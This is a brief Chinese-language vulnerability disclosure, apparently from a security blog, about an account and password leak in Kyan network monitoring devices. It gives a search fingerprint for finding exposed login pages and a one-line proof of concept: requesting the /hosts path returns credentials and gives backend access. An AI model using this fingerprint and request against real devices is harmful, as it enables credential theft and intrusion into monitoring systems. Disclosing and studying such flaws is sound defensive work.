Kyan 网络监控设备 hosts 账号密码泄露漏洞

漏洞描述

Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限。

漏洞影响

Kyan

网络测绘

title=”platform – Login”

漏洞复现

登录页面如下

20240321145330146-ky-1.fe5e5f3c_2024-03-21_14-53-16 (1)

POC

http://xxx.xxx.xxx.xxx/hosts

20240321145419418-ky-2.4dededbe_2024-03-21_14-54-05 (1)

成功获得账号密码

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容